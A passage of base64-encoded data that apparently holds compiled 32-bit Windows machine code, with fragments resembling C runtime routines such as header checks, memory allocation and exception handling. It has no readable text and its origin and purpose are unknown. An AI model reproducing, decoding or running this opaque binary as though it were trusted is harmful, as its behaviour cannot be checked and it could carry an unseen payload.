//+JOINN5P/HRfz+////6AkAAACLReTo9dP//8P/dQjoMBYAAFnDi/9Vi+z/BVBmARBoABAAAOggxv//WYtNCIlBCIXAdA2DSQwIx0EYABAAAOsRg0kMBI1BFIlBCMdBGAIAAACLQQiDYQQAiQFdw4v/VYvsi0UIg/j+dQ/o/pX//8cACQAAADPAXcNWM/Y7xnwIOwUIewEQchzo4JX//1ZWVlZWxwAJAAAA6GiV//+DxBQzwOsai8iD4B/B+QWLDI0gewEQweAGD75EAQSD4EBeXcO4oFoBEMOh4HoBEFZqFF6FwHUHuAACAADrBjvGfQeLxqPgegEQagRQ6KDF//9ZWaPcagEQhcB1HmoEVok14HoBEOiHxf//WVmj3GoBEIXAdQVqGlhewzPSuaBaARDrBaHcagEQiQwCg8Egg8IEgfkgXQEQfOpq/l4z0rmwWgEQV4vCwfgFiwSFIHsBEIv6g+cfwecGiwQHg/j/dAg7xnQEhcB1Aokxg8EgQoH5EFsBEHzOXzPAXsPoEBgAAIA9lGMBEAB0BejZFQAA/zXcagEQ6MOO//9Zw4v/VYvsVot1CLigWgEQO/ByIoH+AF0BEHcai84ryMH5BYPBEFHo/dX//4FODACAAABZ6wqDxiBW/xUEAQEQXl3Di/9Vi+yLRQiD+BR9FoPAEFDo0NX//4tFDIFIDACAAABZXcOLRQyDwCBQ/xUEAQEQXcOL/1WL7ItFCLmgWgEQO8FyHz0AXQEQdxiBYAz/f///K8HB+AWDwBBQ6K3U//9ZXcODwCBQ/xUAAQEQXcOL/1WL7ItNCIP5FItFDH0TgWAM/3///4PBEFHoftT//1ldw4PAIFD/FQABARBdw4v/VYvsi0UIVjP2O8Z1Hejjk///VlZWVlbHABYAAADoa5P//4PEFIPI/+sDi0AQXl3Di/9Vi+yD7BChHFABEDPFiUX8U1aLdQz2RgxAVw+FNgEAAFbopv///1m7GFgBEIP4/3QuVuiV////WYP4/nQiVuiJ////wfgFVo08hSB7ARDoef///4PgH1nB4AYDB1nrAovDikAkJH88Ag+E6AAAAFboWP///1mD+P90LlboTP///1mD+P50IlboQP///8H4BVaNPIUgewEQ6DD///+D4B9ZweAGAwdZ6wKLw4pAJCR/PAEPhJ8AAABW6A////9Zg/j/dC5W6AP///9Zg/j+dCJW6Pf+///B+AVWjTyFIHsBEOjn/v//g+AfWcHgBgMHWesCi8P2QASAdF3/dQiNRfRqBVCNRfBQ6MEYAACDxBCFwHQHuP//AADrXTP/OX3wfjD/TgR4EosGikw99IgIiw4PtgFBiQ7rDg++RD30VlDoFqn//1lZg/j/dMhHO33wfNBmi0UI6yCDRgT+eA2LDotFCGaJAYMGAusND7dFCFZQ6HgVAABZWYtN/F9eM81b6MCD///Jw4v/Vlcz/423KF0BEP826Lah//+DxwRZiQaD/yhy6F9ew6EcUAEQg8gBM8k5BVRmARAPlMGLwcOL/1WL7IPsEFNWi3UMM9s783QVOV0QdBA4HnUSi0UIO8N0BTPJZokIM8BeW8nD/3UUjU3w6G6F//+LRfA5WBR1H4tFCDvDdAdmD7YOZokIOF38dAeLRfiDYHD9M8BA68qNRfBQD7YGUOjBhf//WVmFwHR9i0Xwi4isAAAAg/kBfiU5TRB8IDPSOV0ID5XCUv91CFFWagn/cAT/FSABARCFwItF8HUQi00QO4isAAAAciA4XgF0G4uArAAAADhd/A+EZf///4tN+INhcP3pWf///+gxkf//xwAqAAAAOF38dAeLRfiDYHD9g8j/6Tr///8zwDldCA+VwFD/dQiLRfBqAVZqCf9wBP8VIAEBEIXAD4U6////67qL/1WL7GoA/3UQ/3UM/3UI6NT+//+DxBBdw8zMVotEJBQLwHUoi0wkEItEJAwz0vfxi9iLRCQI9/GL8IvD92QkEIvIi8b3ZCQQA9HrR4vIi1wkEItUJAyLRCQI0enR29Hq0dgLyXX09/OL8PdkJBSLyItEJBD35gPRcg47VCQMdwhyDztEJAh2CU4rRCQQG1QkFDPbK0QkCBtUJAz32vfYg9oAi8qL04vZi8iLxl7CEABqDGiIMQEQ6H/N//+LTQgz/zvPdi5q4Fgz0vfxO0UMG8BAdR/oFpD//8cADAAAAFdXV1dX6J6P//+DxBQzwOnVAAAAD69NDIvxiXUIO/d1AzP2RjPbiV3kg/7gd2mDPQR7ARADdUuDxg+D5vCJdQyLRQg7BfB6ARB3N2oE6BDR//9ZiX38/3UI6BbZ//9ZiUXkx0X8/v///+hfAAAAi13kO990Ef91CFdT6A2K//+DxAw733VhVmoI/zWsZAEQ/xUIAQEQi9g733VMOT2YaQEQdDNW6Ijk//9ZhcAPhXL///+LRRA7xw+EUP///8cADAAAAOlF////M/+LdQxqBOi0z///WcM733UNi0UQO8d0BscADAAAAIvD6LPM///DahBoqDEBEOhhzP//i10Ihdt1Dv91DOis3///WenMAQAAi3UMhfZ1DFPo34j//1nptwEAAIM9BHsBEAMPhZMBAAAz/4l95IP+4A+HigEAAGoE6B3Q//9ZiX38U+hG0P//WYlF4DvHD4SeAAAAOzXwegEQd0lWU1DoKNX//4PEDIXAdAWJXeTrNVbo99f//1mJReQ7x3Qni0P8SDvGcgKLxlBT/3Xk6HOJ//9T6PbP//+JReBTUOgc0P//g8QYOX3kdUg793UGM/ZGiXUMg8YPg+bwiXUMVlf/NaxkARD/FQgBARCJReQ7x3Qgi0P8SDvGcgKLxlBT/3Xk6B+J//9T/3Xg6M/P//+DxBTHRfz+////6C4AAACDfeAAdTGF9nUBRoPGD4Pm8Il1DFZTagD/NaxkARD/FRABARCL+OsSi3UMi10IagToTs7//1nDi33khf8Phb8AAAA5PZhpARB0LFbo3OL//1mFwA+F0v7//+itjf//OX3gdWyL8P8VHAABEFDoWI3//1mJButfhf8PhYMAAADoiI3//zl94HRoxwAMAAAA63GF9nUBRlZTagD/NaxkARD/FRABARCL+IX/dVY5BZhpARB0NFboc+L//1mFwHQfg/7gds1W6GPi//9Z6DyN///HAAwAAAAzwOjAyv//w+gpjf//6Xz///+F/3UW6BuN//+L8P8VHAABEFDoy4z//4kGWYvH69KL/1WL7FFRU4tdCFZXM/Yz/4l9/Dsc/VBdARB0CUeJffyD/xdy7oP/Fw+DdwEAAGoD6MIWAABZg/gBD4Q0AQAAagPosRYAAFmFwHUNgz3QXwEQAQ+EGwEAAIH7/AAAAA+EQQEAAGi8GgEQuxQDAABTv1hmARBX6OPb//+DxAyFwHQNVlZWVlbo6or//4PEFGgEAQAAvnFmARBWagDGBXVnARAA/xXMAAEQhcB1JmikGgEQaPsCAABW6KHb//+DxAyFwHQPM8BQUFBQUOimiv//g8QUVuj52///QFmD+Dx2OFbo7Nv//4PuOwPGagO5bGkBEGjICgEQK8hRUOjI6v//g8QUhcB0ETP2VlZWVlboY4r//4PEFOsCM/ZooBoBEFNX6OPp//+DxAyFwHQNVlZWVlboP4r//4PEFItF/P80xVRdARBTV+i+6f//g8QMhcB0DVZWVlZW6BqK//+DxBRoECABAGh4GgEQV+ggFAAAg8QM6zJq9P8VvAABEIvYO950JIP7/3QfagCNRfhQjTT9VF0BEP826Dfb//9ZUP82U/8VOAEBEF9eW8nDagPoRhUAAFmD+AF0FWoD6DkVAABZhcB1H4M90F8BEAF1Fmj8AAAA6Cn+//9o/wAAAOgf/v//WVnDzMzMzMzMzMzMzMzMzMyL/1WL7ItNCLhNWgAAZjkBdAQzwF3Di0E8A8GBOFBFAAB17zPSuQsBAABmOUgYD5TCi8Jdw8zMzMzMzMzMzMzMi/9Vi+yLRQiLSDwDyA+3QRRTVg+3cQYz0leNRAgYhfZ2G4t9DItIDDv5cgmLWAgD2Tv7cgpCg8AoO9Zy6DPAX15bXcPMzMzMzMzMzMzMzMyL/1WL7Gr+aMgxARBogIkAEGShAAAAAFCD7AhTVlehHFABEDFF+DPFUI1F8GSjAAAAAIll6MdF/AAAAABoAAAAEOgq////g8QEhcB0VYtFCC0AAAAQUGgAAAAQ6FD///+DxAiFwHQ7i0Akwegf99CD4AHHRfz+////i03wZIkNAAAAAFlfXluL5V3Di0XsiwiLATPSPQUAAMAPlMKLwsOLZejHRfz+////M8CLTfBkiQ0AAAAAWV9eW4vlXcNqCGjoMQEQ6AfH///oCJz//4tAeIXAdBaDZfwA/9DrBzPAQMOLZejHRfz+////6NETAADoIMf//8Po25v//4tAfIXAdAL/0Om0////aghoCDIBEOi7xv///zVsaQEQ6GqZ//9ZhcB0FoNl/AD/0OsHM8BAw4tl6MdF/P7////off///8xoDcIAEOjEmP//WaNsaQEQw4v/VYvsi0UIo3BpARCjdGkBEKN4aQEQo3xpARBdw4v/VYvsi0UIiw1oWAEQVjlQBHQPi/Fr9gwDdQiDwAw7xnLsa8kMA00IXjvBcwU5UAR0AjPAXcP/NXhpARDo2Jj//1nDaiBoKDIBEOgQxv//M/+JfeSJfdiLXQiD+wt/THQVi8NqAlkrwXQiK8F0CCvBdGQrwXVE6HGa//+L+Il92IX/dRSDyP/pYQEAAL5waQEQoXBpARDrYP93XIvT6F3///+L8IPGCIsG61qLw4PoD3Q8g+gGdCtIdBzoVIj//8cAFgAAADPAUFBQUFDo2of//4PEFOuuvnhpARCheGkBEOsWvnRpARChdGkBEOsKvnxpARChfGkBEMdF5AEAAABQ6BSY//+JReBZM8CDfeABD4TYAAAAOUXgdQdqA+hNu///OUXkdAdQ6DnJ//9ZM8CJRfyD+wh0CoP7C3QFg/sEdRuLT2CJTdSJR2CD+wh1QItPZIlN0MdHZIwAAACD+wh1LosNXFgBEIlN3IsNYFgBEIsVXFgBEAPKOU3cfRmLTdxryQyLV1yJRBEI/0Xc69vofJf//4kGx0X8/v///+gVAAAAg/sIdR//d2RT/1XgWesZi10Ii33Yg33kAHQIagDox8f//1nDU/9V4FmD+wh0CoP7C3QFg/sEdRGLRdSJR2CD+wh1BotF0IlHZDPA6LLE///Di/9Vi+yLRQijhGkBEF3Di/9Vi+yLRQijkGkBEF3Di/9Vi+yLRQijlGkBEF3DahBoSDIBEOgzxP//g2X8AP91DP91CP8VSAEBEIlF5Osvi0XsiwCLAIlF4DPJPRcAAMAPlMGLwcOLZeiBfeAXAADAdQhqCP8VrAABEINl5ADHRfz+////i0Xk6CXE///Di/9Vi+yD7BD/dQiNTfDoIHr//w+2RQyLTfSKVRSEVAEddR6DfRAAdBKLTfCLicgAAAAPtwRBI0UQ6wIzwIXAdAMzwECAffwAdAeLTfiDYXD9ycOL/1WL7GoEagD/dQhqAOia////g8QQXcPMzMzMi0QkCItMJBALyItMJAx1CYtEJAT34cIQAFP34YvYi0QkCPdkJBQD2ItEJAj34QPTW8IQAIv/VYvsagpqAP91COg9DgAAg8QMXcPMzFWL7FNWV1VqAGoAaBTGABD/dQjodhoAAF1fXluL5V3Di0wkBPdBBAYAAAC4AQAAAHQyi0QkFItI/DPI6Bh3//9Vi2gQi1AoUotQJFLoFAAAAIPECF2LRCQIi1QkEIkCuAMAAADDU1ZXi0QkEFVQav5oHMYAEGT/NQAAAAChHFABEDPEUI1EJARkowAAAACLRCQoi1gIi3AMg/7/dDqDfCQs/3QGO3QkLHYtjTR2iwyziUwkDIlIDIN8swQAdRdoAQEAAItEswjoSQAAAItEswjoXwAAAOu3i0wkBGSJDQAAAACDxBhfXlvDM8Bkiw0AAAAAgXkEHMYAEHUQi1EMi1IMOVEIdQW4AQAAAMNTUbsQXgEQ6wtTUbsQXgEQi0wkDIlLCIlDBIlrDFVRUFhZXVlbwgQA/9DDahBoaDIBEOjhwf//M8CLXQgz/zvfD5XAO8d1HeiAhP//xwAWAAAAV1dXV1foCIT//4PEFIPI/+tTgz0EewEQA3U4agToqsX//1mJffxT6NPF//9ZiUXgO8d0C4tz/IPuCYl15OsDi3Xkx0X8/v///+glAAAAOX3gdRBTV/81rGQBEP8VTAEBEIvwi8boocH//8Mz/4tdCIt15GoE6HjE//9Zw4v/VYvsg+wMoRxQARAzxYlF/GoGjUX0UGgEEAAA/3UIxkX6AP8VMAEBEIXAdQWDyP/rCo1F9FDo0v3//1mLTfwzzeg3df//ycOL/1WL7IPsNKEcUAEQM8WJRfyLRRCLTRiJRdiLRRRTiUXQiwBWiUXci0UIVzP/iU3MiX3giX3UO0UMD4RfAQAAizV8AAEQjU3oUVD/1osdIAEBEIXAdF6DfegBdViNRehQ/3UM/9aFwHRLg33oAXVFi3Xcx0XUAQAAAIP+/3UM/3XY6PrS//+L8FlGO/d+W4H+8P//f3dTjUQ2CD0ABAAAdy/oGgEAAIvEO8d0OMcAzMwAAOstV1f/ddz/ddhqAf91CP/Ti/A793XDM8Dp0QAAAFDohNP//1k7x3QJxwDd3QAAg8AIiUXk6wOJfeQ5feR02I0ENlBX/3Xk6DJ9//+DxAxW/3Xk/3Xc/3XYagH/dQj/04XAdH+LXcw733QdV1f/dRxTVv915Ff/dQz/FdwAARCFwHRgiV3g61uLHdwAARA5fdR1FFdXV1dW/3XkV/91DP/Ti/A793Q8VmoB6HSy//9ZWYlF4DvHdCtXV1ZQVv915Ff/dQz/0zvHdQ7/deDoHHz//1mJfeDrC4N93P90BYtN0IkB/3Xk6KzX//9Zi0XgjWXAX15bi038M83og3P//8nDzMzMzMzMzMzMzMzMzFGNTCQIK8iD4Q8DwRvJC8FZ6aoCAABRjUwkCCvIg+EHA8EbyQvBWemUAgAAi/9Vi+yLTQhTM9s7y1ZXfFs7DQh7ARBzU4vBwfgFi/GNPIUgewEQiweD5h/B5gYDxvZABAF0NYM4/3Qwgz3QXwEQAXUdK8t0EEl0CEl1E1Nq9OsIU2r16wNTavb/FVgAARCLB4MMBv8zwOsV6FeB///HAAkAAADoX4H//4kYg8j/X15bXcOL/1WL7ItFCIP4/nUY6EOB//+DIADoKIH//8cACQAAAIPI/13DVjP2O8Z8IjsFCHsBEHMai8iD4B/B+QWLDI0gewEQweAGA8H2QAQBdSToAoH//4kw6OiA//9WVlZWVscACQAAAOhwgP//g8QUg8j/6wKLAF5dw2oMaIgyARDoC77//4t9CIvHwfgFi/eD5h/B5gYDNIUgewEQx0XkAQAAADPbOV4IdTZqCujlwf//WYld/DleCHUaaKAPAACNRgxQ6In5//9ZWYXAdQOJXeT/RgjHRfz+////6DAAAAA5XeR0HYvHwfgFg+cfwecGiwSFIHsBEI1EOAxQ/xUEAQEQi0Xk6Mu9///DM9uLfQhqCuilwP//WcOL/1WL7ItFCIvIg+AfwfkFiwyNIHsBEMHgBo1EAQxQ/xUAAQEQXcOL/1WL7IPsEKEcUAEQM8WJRfxWM/Y5NdBeARB0T4M9VF8BEP51BeiWCwAAoVRfARCD+P91B7j//wAA63BWjU3wUWoBjU0IUVD/FUAAARCFwHVngz3QXgEQAnXa/xUcAAEQg/h4dc+JNdBeARBWVmoFjUX0UGoBjUUIUFb/FVAAARBQ/xXcAAEQiw1UXwEQg/n/dKJWjVXwUlCNRfRQUf8VVAABEIXAdI1mi0UIi038M81e6M1w///Jw8cF0F4BEAEAAADr48zMzMzMzMzMzMzMUY1MJAQryBvA99AjyIvEJQDw//87yHIKi8FZlIsAiQQkwy0AEAAAhQDr6WoQaKgyARDoSbz//zPbiV3kagHoQ8D//1mJXfxqA1+JfeA7PeB6ARB9V4v3weYCodxqARADxjkYdESLAPZADIN0D1DoQQsAAFmD+P90A/9F5IP/FHwoodxqARCLBAaDwCBQ/xXIAAEQodxqARD/NAbogHj//1mh3GoBEIkcBkfrnsdF/P7////oCQAAAItF5OgFvP//w2oB6OS+//9Zw4v/VYvsU1aLdQiLRgyLyIDhAzPbgPkCdUCpCAEAAHQ5i0YIV4s+K/iF/34sV1BW6D/q//9ZUOj65v//g8QMO8d1D4tGDITAeQ+D4P2JRgzrB4NODCCDy/9fi0YIg2YEAIkGXovDW13Di/9Vi+xWi3UIhfZ1CVboNQAAAFnrL1bofP///1mFwHQFg8j/6x/3RgwAQAAAdBRW6Nbp//9Q6MMKAABZ99hZG8DrAjPAXl3DahRoyDIBEOj6uv//M/+JfeSJfdxqAejxvv//WYl9/DP2iXXgOzXgegEQD42DAAAAodxqARCNBLA5OHReiwD2QAyDdFZQVujb6P//WVkz0kKJVfyh3GoBEIsEsItIDPbBg3QvOVUIdRFQ6Er///9Zg/j/dB7/ReTrGTl9CHUU9sECdA9Q6C////9Zg/j/dQMJRdyJffzoCAAAAEbrhDP/i3XgodxqARD/NLBW6OTo//9ZWcPHRfz+////6BIAAACDfQgBi0XkdAOLRdzoe7r//8NqAehavf//WcNqAegf////WcOL/1WL7FFWi3UMVujQ6P//iUUMi0YMWaiCdRnot3z//8cACQAAAINODCC4//8AAOk9AQAAqEB0DeiafP//xwAiAAAA6+GoAXQXg2YEAKgQD4SNAAAAi04Ig+D+iQ6JRgyLRgyDZgQAg2X8AFNqAoPg71sLw4lGDKkMAQAAdSzoqOb//4PAIDvwdAzonOb//4PAQDvwdQ3/dQzoKeb//1mFwHUHVujV5f//WfdGDAgBAABXD4SDAAAAi0YIiz6NSAKJDotOGCv4K8uJTgSF/34dV1D/dQzoyOT//4PEDIlF/OtOg8ggiUYM6T3///+LTQyD+f90G4P5/nQWi8GD4B+L0cH6BcHgBgMElSB7ARDrBbgYWAEQ9kAEIHQVU2oAagBR6DDc//8jwoPEEIP4/3Qti0YIi10IZokY6x1qAo1F/FD/dQyL+4tdCGaJXfzoUOT//4PEDIlF/Dl9/HQLg04MILj//wAA6weLwyX//wAAX1teycOL/1WL7IPsEFNWi3UMM9tXi30QO/N1FDv7dhCLRQg7w3QCiRgzwOmDAAAAi0UIO8N0A4MI/4H/////f3Yb6CF7//9qFl5TU1NTU4kw6Kp6//+DxBSLxutW/3UYjU3w6KBu//+LRfA5WBQPhZwAAABmi0UUuf8AAABmO8F2NjvzdA87+3YLV1NW6FJ1//+DxAzoznr//8cAKgAAAOjDev//iwA4Xfx0B4tN+INhcP1fXlvJwzvzdDI7+3cs6KN6//9qIl5TU1NTU4kw6Cx6//+DxBQ4XfwPhHn///+LRfiDYHD96W3///+IBotFCDvDdAbHAAEAAAA4XfwPhCX///+LRfiDYHD96Rn///+NTQxRU1dWagGNTRRRU4ldDP9wBP8V3AABEDvDdBQ5XQwPhV7///+LTQg7y3S9iQHruf8VHAABEIP4eg+FRP///zvzD4Rn////O/sPhl////9XU1boe3T//4PEDOlP////i/9Vi+xqAP91FP91EP91DP91COh8/v//g8QUXcNqAui+qv//WcOL/1WL7IPsFFZX/3UIjU3s6Fxt//+LRRCLdQwz/zvHdAKJMDv3dSzopXn//1dXV1dXxwAWAAAA6C15//+DxBSAffgAdAeLRfSDYHD9M8Dp2AEAADl9FHQMg30UAnzJg30UJH/Di03sU4oeiX38jX4Bg7msAAAAAX4XjUXsUA+2w2oIUOgmBwAAi03sg8QM6xCLkcgAAAAPtsMPtwRCg+AIhcB0BYofR+vHgPstdQaDTRgC6wWA+yt1A4ofR4tFFIXAD4xLAQAAg/gBD4RCAQAAg/gkD485AQAAhcB1KoD7MHQJx0UUCgAAAOs0igc8eHQNPFh0CcdFFAgAAADrIcdFFBAAAADrCoP4EHUTgPswdQ6KBzx4dAQ8WHUER4ofR4uxyAAAALj/////M9L3dRQPtssPtwxO9sEEdAgPvsuD6TDrG/fBAwEAAHQxisuA6WGA+RkPvst3A4PpIIPByTtNFHMZg00YCDlF/HIndQQ7ynYhg00YBIN9EAB1I4tFGE+oCHUgg30QAHQDi30Mg2X8AOtbi138D69dFAPZiV38ih9H64u+////f6gEdRuoAXU9g+ACdAmBffwAAACAdwmFwHUrOXX8diboBHj///ZFGAHHACIAAAB0BoNN/P/rD/ZFGAJqAFgPlcADxolF/ItFEIXAdAKJOPZFGAJ0A/dd/IB9+AB0B4tF9INgcP2LRfzrGItFEIXAdAKJMIB9+AB0B4tF9INgcP0zwFtfXsnDi/9Vi+wzwFD/dRD/dQz/dQg5BTRjARB1B2gAWAEQ6wFQ6Kv9//+DxBRdw4v/VYvsg+wUU1ZX6GSH//+DZfwAgz1gagEQAIvYD4WOAAAAaHwbARD/FUQBARCL+IX/D4QqAQAAizWYAAEQaHAbARBX/9aFwA+EFAEAAFDorob//8cEJGAbARBXo2BqARD/1lDomYb//8cEJEwbARBXo2RqARD/1lDohIb//8cEJDAbARBXo2hqARD/1lDob4b//1mjcGoBEIXAdBRoGBsBEFf/1lDoV4b//1mjbGoBEKFsagEQO8N0TzkdcGoBEHRHUOi1hv///zVwagEQi/DoqIb//1lZi/iF9nQshf90KP/WhcB0GY1N+FFqDI1N7FFqAVD/14XAdAb2RfQBdQmBTRAAACAA6zmhZGoBEDvDdDBQ6GWG//9ZhcB0Jf/QiUX8hcB0HKFoagEQO8N0E1DoSIb//1mFwHQI/3X8/9CJRfz/NWBqARDoMIb//1mFwHQQ/3UQ/3UM/3UI/3X8/9DrAjPAX15bycOL/1WL7ItNCFYz9jvOfB6D+QJ+DIP5A3UUocxfARDrKKHMXwEQiQ3MXwEQ6xvo3HX//1ZWVlZWxwAWAAAA6GR1//+DxBSDyP9eXcOL/1WL7IHsKAMAAKEcUAEQM8WJRfz2BeBeARABVnQIagrol+j//1nouuz//4XAdAhqFui87P//WfYF4F4BEAIPhMoAAACJheD9//+Jjdz9//+Jldj9//+JndT9//+JtdD9//+Jvcz9//9mjJX4/f//ZoyN7P3//2aMncj9//9mjIXE/f//ZoylwP3//2aMrbz9//+cj4Xw/f//i3UEjUUEiYX0/f//x4Uw/f//AQABAIm16P3//4tA/GpQiYXk/f//jYXY/P//agBQ6HBv//+Nhdj8//+DxAyJhSj9//+NhTD9//9qAMeF2Pz//xUAAECJteT8//+JhSz9////FXAAARCNhSj9//9Q/xVsAAEQagPoCKj//8zMzMzMzMzMzFWL7FdWU4tNEAvJdE2LdQiLfQy3QbNatiCNSQCKJgrkigd0JwrAdCODxgGDxwE653IGOuN3AgLmOsdyBjrDdwICxjrgdQuD6QF10TPJOuB0Cbn/////cgL32YvBW15fycMzwFBQagNQagNoAAAAQGiIGwEQ/xUYAAEQo1RfARDDoVRfARBWizU0AAEQg/j/dAiD+P50A1D/1qFQXwEQg/j/dAiD+P50A1D/1l7Di/9Vi+xTVot1CFcz/4PL/zv3dRzo3nP//1dXV1dXxwAWAAAA6GZz//+DxBQLw+tC9kYMg3Q3VuhR9f//VovY6LEDAABW6Lbf//9Q6NgCAACDxBCFwH0Fg8v/6xGLRhw7x3QKUOh6bf//WYl+HIl+DIvDX15bXcNqDGjwMgEQ6MCw//+DTeT/M8CLdQgz/zv3D5XAO8d1Hehbc///xwAWAAAAV1dXV1fo43L//4PEFIPI/+sM9kYMQHQMiX4Mi0Xk6MOw///DVuhW3v//WYl9/FboKv///1mJReTHRfz+////6AUAAADr1Yt1CFbopN7//1nDahBoEDMBEOhEsP//i0UIg/j+dRPo63L//8cACQAAAIPI/+mqAAAAM9s7w3wIOwUIewEQchroynL//8cACQAAAFNTU1NT6FJy//+DxBTr0IvIwfkFjTyNIHsBEIvwg+YfweYGiw8PvkwOBIPhAXTGUOjE8f//WYld/IsH9kQGBAF0Mf91COg48f//WVD/FTAAARCFwHUL/xUcAAEQiUXk6wOJXeQ5XeR0Gehpcv//i03kiQjoTHL//8cACQAAAINN5P/HRfz+////6AkAAACLReTov6///8P/dQjo+vH//1nDi/9Vi+yD7BhT/3UQjU3o6K9l//+LXQiNQwE9AAEAAHcPi0Xoi4DIAAAAD7cEWOt1iV0IwX0ICI1F6FCLRQgl/wAAAFDoAWb//1lZhcB0EopFCGoCiEX4iF35xkX6AFnrCjPJiF34xkX5AEGLRehqAf9wFP9wBI1F/FBRjUX4UI1F6GoBUOjyzP//g8QghcB1EDhF9HQHi0Xwg2Bw/TPA6xQPt0X8I0UMgH30AHQHi03wg2Fw/VvJw4v/VYvsVot1CFdW6Bnw//9Zg/j/dFChIHsBEIP+AXUJ9oCEAAAAAXULg/4CdRz2QEQBdBZqAuju7///agGL+Ojl7///WVk7x3QcVujZ7///WVD/FTQAARCFwHUK/xUcAAEQi/jrAjP/Vug17///i8bB+AWLBIUgewEQg+YfweYGWcZEMAQAhf90DFfoAXH//1mDyP/rAjPAX15dw2oQaDAzARDoD67//4tFCIP4/nUb6Mlw//+DIADornD//8cACQAAAIPI/+mOAAAAM/87x3wIOwUIewEQciHooHD//4k46IZw///HAAkAAABXV1dXV+gOcP//g8QU68mLyMH5BY0cjSB7ARCL8IPmH8HmBosLD75MMQSD4QF0v1DogO///1mJffyLA/ZEMAQBdA7/dQjoy/7//1mJReTrD+grcP//xwAJAAAAg03k/8dF/P7////oCQAAAItF5Oierf//w/91COjZ7///WcOL/1WL7FaLdQiLRgyog3QeqAh0Gv92COjSaf//gWYM9/v//zPAWYkGiUYIiUYEXl3DzMzMzMzMzMzMzMzMzI1C/1vDjaQkAAAAAI1kJAAzwIpEJAhTi9jB4AiLVCQI98IDAAAAdBWKCoPCATrLdM+EyXRR98IDAAAAdesL2FeLw8HjEFYL2IsKv//+/n6LwYv3M8sD8AP5g/H/g/D/M88zxoPCBIHhAAEBgXUcJQABAYF00yUAAQEBdQiB5gAAAIB1xF5fWzPAw4tC/DrDdDaEwHTvOuN0J4TkdOfB6BA6w3QVhMB03DrjdAaE5HTU65ZeX41C/1vDjUL+Xl9bw41C/V5fW8ONQvxeX1vDi/9Wi/GLBoXAdApQ6NFo//+DJgBZg2YEAINmCABew4v/VmoYi/FqAFboRGn//4PEDIvGXsNqDGhQMwEQ6AGs//+DZfwAUf8VRAABEINl5ADrHotF7IsAiwAzyT0XAADAD5TBi8HDi2Xox0XkDgAHgMdF/P7///+LReToCKz//8OL/1WL7ItFCIXAfA47QQR9CYsJjQSBXcIEAGoAagBqAWiMAADA/xUYAQEQzIv/VovxjU4U6Gb///8zwIlGLIlGMIlGNIvGXsOL/1aL8Y1GFFD/FcgAARCNTixe6SD///+L/1WL7FZXi/GNfhRX/xUEAQEQi0Ywi00IO8h/I4XJfB87yHUOi3YIV/8VAAEBEIvG6xZRjU4s6GT///+LMOvoV/8VAAEBEDPAX15dwgQAi/9Wi/Hoc////7gAAAAQjU4UxwY4AAAAiUYIiUYEx0YMAAkAAMdGEKAbARDo1f7//4XAfQfGBdRqARABi8Zew4B5CADHAbAbARB0DotJBIXJdAdR/xXoAAEQw4v/VYvs/3UIagD/cQT/FQgBARBdwgQAi/9Vi+yDfQgAdA7/dQhqAP9xBP8VeAABEF3CBACL/1WL7DPAOUUIdQn/dQyLAf8Q6yE5RQx1DP91CIsB/1AEM8DrEP91DP91CFD/cQT/FRABARBdwggAi/9Vi+z/dQhqAP9xBP8VTAEBEF3CBACL/1WL7FaL8ehT////9kUIAXQHVuhdXv//WYvGXl3CBACL/1WL7IvBi00IiUgExwDEGwEQM8nHQBQCAAAAiUgMiUgQZolIGGaJSBqJQAhdwgQAi/9Vi+yLRQz3ZRCF0ncFg/j/dge4VwAHgF3Di00IiQEzwF3Di/9Vi+yLSQSLAV3/YAQz0o1BFELwD8EQjUEIw4vBw4v/VYvs9kUIAVaL8ccGxBsBEHQHVujHXf//WYvGXl3CBACL/1WL7ItFDItNEIPK/yvQO9FzB7hXAAeAXcMDwYtNCIkBM8Bdw4v/VYvsVot1CFf/dQyDxgiD5viNRQhWUIv56Fb///+DxAyFwHw2/3UIjUUIahBQ6Kb///+DxAyFwHwhi08E/3UIiwH/EIXAdBNOg2AEAIk4x0AMAQAAAIlwCOsCM8BfXl3CCACL/1WL7FaLdQxX/3UQg8YIg+b4jUUMVlCL+ejy/v//g8QMhcB8Lf91DI1FDGoQUOhC////g8QMhcB8GP91DItPBP91CIsB/1AIhcB0Bk6JcAjrAjPAX15dwgwAzP8lFAEBEIv/VYvsUVOLRQyDwAyJRfxkix0AAAAAiwNkowAAAACLRQiLXQyLbfyLY/z/4FvJwggAWFmHBCT/4Iv/VYvsUVFTVldkizUAAAAAiXX8x0X49OAAEGoA/3UM/3X4/3UI6Jb///+LRQyLQASD4P2LTQyJQQRkiz0AAAAAi138iTtkiR0AAAAAX15bycIIAFWL7IPsCFNWV/yJRfwzwFBQUP91/P91FP91EP91DP91COgGDwAAg8QgiUX4X15bi0X4i+Vdw4v/VYvsVvyLdQyLTggzzujtW///agBW/3YU/3YMagD/dRD/dhD/dQjoyQ4AAIPEIF5dw4v/VYvsg+w4U4F9CCMBAAB1Ergx4gAQi00MiQEzwEDpsAAAAINl2ADHRdxd4gAQoRxQARCNTdgzwYlF4ItFGIlF5ItFDIlF6ItFHIlF7ItFIIlF8INl9ACDZfgAg2X8AIll9Ilt+GShAAAAAIlF2I1F2GSjAAAAAMdFyAEAAACLRQiJRcyLRRCJRdDoEHz//4uAgAAAAIlF1I1FzFCLRQj/MP9V1FlZg2XIAIN9/AB0F2SLHQAAAACLA4td2IkDZIkdAAAAAOsJi0XYZKMAAAAAi0XIW8nDi/9Vi+xRU/yLRQyLSAgzTQzo4Vr//4tFCItABIPgZnQRi0UMx0AkAQAAADPAQOts62pqAYtFDP9wGItFDP9wFItFDP9wDGoA/3UQi0UM/3AQ/3UI6JMNAACDxCCLRQyDeCQAdQv/dQj/dQzo/P3//2oAagBqAGoAagCNRfxQaCMBAADoof7//4PEHItF/ItdDItjHItrIP/gM8BAW8nDi/9Vi+xRU1ZXi30Ii0cQi3cMiUX8i97rLYP+/3UF6Drf//+LTfxOi8ZrwBQDwYtNEDlIBH0FO0gIfgWD/v91Cf9NDItdCIl1CIN9DAB9yotFFEaJMItFGIkYO18MdwQ783YF6PXe//+LxmvAFANF/F9eW8nDi/9Vi+yLRQxWi3UIiQboonr//4uAmAAAAIlGBOiUev//ibCYAAAAi8ZeXcOL/1WL7Oh/ev//i4CYAAAA6wqLCDtNCHQKi0AEhcB18kBdwzPAXcOL/1WL7FboV3r//4t1CDuwmAAAAHUR6Ed6//+LTgSJiJgAAABeXcPoNnr//4uAmAAAAOsJi0gEO/F0D4vBg3gEAHXxXl3pS97//4tOBIlIBOvSi/9Vi+yD7BihHFABEINl6ACNTegzwYtNCIlF8ItFDIlF9ItFFEDHRexT4QAQiU34iUX8ZKEAAA